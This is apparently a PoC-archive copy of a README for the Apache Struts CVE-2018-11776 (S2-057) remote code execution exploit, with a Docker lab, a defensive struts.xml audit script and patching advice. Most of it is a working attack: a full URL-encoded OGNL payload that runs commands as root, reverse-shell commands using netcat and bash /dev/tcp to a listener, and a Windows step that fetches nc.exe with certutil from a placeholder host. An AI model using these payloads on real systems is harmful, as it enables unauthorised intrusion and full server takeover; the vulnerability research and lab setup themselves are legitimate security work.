Related vulnerability
Title:
Apache Struts input validation vulnerability
(CVE-2018-11776)
Description: Apache Struts is an open-source project maintained by the Apache Software Foundation (US), an MVC framework for building enterprise Java web applications. It ships in two major product lines, Struts 1 and Struts 2. Apache Struts 2 is the next-generation product: a new framework that merged Struts 1 with WebWork, with an architecture quite different from Struts 1. Apache Struts 2.3 through 2.3.34 and 2.5 through 2.5.16 contain an input validation vulnerability: under certain configurations the namespace taken from the request URL is evaluated as an OGNL expression, which allows remote code execution.
Description
Working Python test and PoC for CVE-2018-11776, includes Docker lab
Introduction
# CVE-2018-11776-Python-PoC
hook-s3c (github.com/hook-s3c), @hook_s3c on twitter
Working Python test and PoC for CVE-2018-11776, originally appearing on;
https://github.com/hook-s3c/CVE-2018-11776-Python-PoC
## What's going on?
Man Yue Mo from Semmle has disclosed a Struts 2 RCE vulnerability (S2-057): the namespace part of the request URL path is evaluated as an OGNL expression, so the payload is delivered in the URL path itself.
Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.
The default configuration is not vulnerable; it takes `struts.mapper.alwaysSelectFullNamespace` set to true plus actions/results defined without a namespace (exactly what the lab config below sets up). But if you are misconfigured... F.
## Set up your docker instance
The exploit works fine against the Docker container built for CVE-2017-5638
(struts2-showcase-2.3.12), once its configuration is weakened as shown in the next section.
```
$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638
```
## Set up your weakened configuration
Open a shell in the running container (`docker exec -it struts2 bash`), install an editor and edit the showcase `struts.xml`:
```
$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml
```
Add the action below (a `redirectAction` result with no namespace parameter):
```
<action name="help">
<result type="redirectAction">
<param name="actionName">date.action</param>
</result>
</action>
```
and also enable full-namespace selection inside the `<struts>` root element; this is the setting that lets the namespace be taken from the request URL:
```
<struts>
<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
```
Restart Tomcat, or just restart the whole container (`docker restart struts2`; the edited file persists in the container's writable layer):
```
$ /usr/local/tomcat/bin/shutdown.sh
```
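As an added example (my own code, not part of this repository), a small Python audit that reads a `struts.xml` and flags the two preconditions the lab just configured: the `alwaysSelectFullNamespace` constant set to true, and `redirectAction`/`chain` results with no `namespace` param sitting in a package that has no fixed namespace. The two embedded XML documents are constructed samples (the page's fragments merged into a minimal file, and a hardened version of the same), not the real showcase configuration; `scan_struts_xml`, `audit_struts_xml` and `is_exposed` are names I chose.

```python
import sys
import xml.etree.ElementTree as ET

CONSTANT = "struts.mapper.alwaysSelectFullNamespace"
# Result types that forward to another action and, when no namespace is
# configured, inherit the namespace of the current request.
NAMESPACE_RESULTS = ("redirectAction", "chain")

# Constructed sample: the two fragments from the lab above merged into one
# minimal struts.xml (not the real showcase file).
WEAK_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
  <package name="default" extends="struts-default">
    <action name="help">
      <result type="redirectAction">
        <param name="actionName">date.action</param>
      </result>
    </action>
  </package>
</struts>"""

# Constructed sample of the same config with the constant off and every
# namespace pinned explicitly.
HARDENED_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="false" />
  <package name="default" namespace="/" extends="struts-default">
    <action name="help">
      <result type="redirectAction">
        <param name="actionName">date</param>
        <param name="namespace">/</param>
      </result>
    </action>
  </package>
</struts>"""


def scan_struts_xml(xml_text):
    """Parse struts.xml and return (constant_on, unscoped_result, findings).

    constant_on:      alwaysSelectFullNamespace is set to true
    unscoped_result:  a redirectAction/chain result has no namespace param and
                      sits in a package with no (or a wildcard) namespace
    findings:         human-readable list of everything flagged
    """
    root = ET.fromstring(xml_text)
    findings = []
    constant_on = False
    unscoped_result = False

    for const in root.iter("constant"):
        if const.get("name") == CONSTANT and const.get("value", "").strip().lower() == "true":
            constant_on = True
            findings.append("constant %s=true" % CONSTANT)

    for pkg in root.iter("package"):
        pkg_name = pkg.get("name", "?")
        ns = pkg.get("namespace")
        pkg_unscoped = ns is None or "*" in ns
        if pkg_unscoped:
            findings.append("package '%s' has no fixed namespace (namespace=%r)" % (pkg_name, ns))
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type")
                if rtype not in NAMESPACE_RESULTS:
                    continue
                if any(p.get("name") == "namespace" for p in result.findall("param")):
                    continue
                findings.append("action '%s' (package '%s'): %s result without a namespace param"
                                % (action.get("name", "?"), pkg_name, rtype))
                if pkg_unscoped:
                    unscoped_result = True
    return constant_on, unscoped_result, findings


def audit_struts_xml(xml_text):
    """Just the findings list."""
    return scan_struts_xml(xml_text)[2]


def is_exposed(xml_text):
    """True only when both preconditions hold at once."""
    constant_on, unscoped_result, _ = scan_struts_xml(xml_text)
    return constant_on and unscoped_result


if __name__ == "__main__":
    # Usage: audit_struts.py [path/to/struts.xml]; defaults to the weak sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_STRUTS_XML
    for line in audit_struts_xml(text):
        print("[!]", line)
    print("exposed:", is_exposed(text))
```

Run it against the container's `/usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml` after the edit above and it should report all three findings; the hardened sample returns no findings, which is the shape you want a production config to have.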
## Verify that target is vulnerable
Test the URL to see whether the arithmetic in the namespace is evaluated and the redirect carries the result: request the first URL and check that the 302 Location header points at the second;
http://0.0.0.0:32771/${2+2}/help.action > http://0.0.0.0:32771/4/date.action
or use the test script, which does the same with random operands;
```
$ ./exploitS2-057-test.py http://0.0.0.0:32771/showcase.action
testing the url for exploit; http://0.0.0.0:32771/${12612+24867}/help.action
URL http://0.0.0.0:32771/showcase.action s2-057 CVE-2018-11776 is vulnerable!
```
## Execute commands PoC
```
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'id'
[Execute]: id
[Url]: http://0.0.0.0:32771/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27id%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
uid=0(root) gid=0(root) groups=0(root)
```
## Reverse shell
get your box ready to accept the reverse shell;
```
$ netcat -lvp 31337
```
run the script;
```
# netcat is not in the container, so install it first
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'apt-get install netcat -y'
# now pop that shell
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'netcat -e "$SHELL" 172.17.0.1 31337'
```
replace 32771 with your exposed container port
## Updated method via bash, forward slashes now supported
```
$ netcat -lvp 31337
```
```
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 "/bin/bash -i >& /dev/tcp/172.17.0.1/31337 0>&1"
```
## Windows reverse shell (untested)
```
# grab netcat binary
# https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'
# execute
$ ./exploitS2-057-cmd.py 0.0.0.0:32771 'nc.exe 172.17.0.1 31337 -e cmd.exe'
```
-----------------
# Debug hell (notes)
Requests with a forward-slash (/) in the command will fail (see the update below for the fix): a literal slash is a path separator, so everything after it is no longer part of the namespace, and Tomcat by default rejects a percent-encoded slash (`%2F`) in the path with a 400 unless `org.apache.tomcat.util.buf.UDecoder.ALLOW_ENCODED_SLASH=true` is set. You may need to work around this, for example by using an environment variable such as `$SHELL` in place of /bin/bash, as in the netcat example above.
- https://stackoverflow.com/questions/9719224/coding-forward-and-backward-slashes-in-tomcat-7
- http://engineering.widen.com/blog/tomcat-slashes/
With this in mind, the Windows `/c` flag will not work as expected either. I've only tested this on the docker container.
## Update
Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved. The code now supports forward slashes, so a reverse shell via bash without netcat is possible, and Windows instances are now supported too (untested).
# Mitigation
Patch your Struts: the fix shipped in 2.3.35 and 2.5.17. Until you can, set `struts.mapper.alwaysSelectFullNamespace` to false and give every package and every redirectAction/chain result an explicit namespace. Or simply don't use it.
I guess you can always sell identity fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)
# Credit
Thanks to ;
- Man Yue Mo, Semmle for disclosing the vulnerability (https://semmle.com/news/apache-struts-CVE-2018-11776)
- piesecurity for the Dockerfile lab and example of OGNL payload (https://github.com/piesecurity/apache-struts2-CVE-2017-5638)
- xfox64x for the write-up on the method (https://github.com/xfox64x/CVE-2018-11776)
- jiguang7 for the test (https://github.com/jiguang7/CVE-2018-11776)
- @Menin_TheMiddle for the writeup (https://www.secjuice.com/apache-struts2-cve-2018-11776/) and putting me in my place :) code now finally supports windows and bash reverse shell
# Greetz
shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces
File snapshot
[4.0K] /data/pocs/be908463b542c2c1803b4d7a3e5146c52efc2407
├── [ 236] Dockerfile
├── [1.6K] exploitS2-057-cmd.py
├── [2.3K] exploitS2-057-test.py
├── [5.1K] README.md
└── [ 12M] struts2-showcase-2.3.12.war
0 directories, 5 files
Notes
1. Prefer accessing the PoC through its original source.
2. If the source is gone or unreachable, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.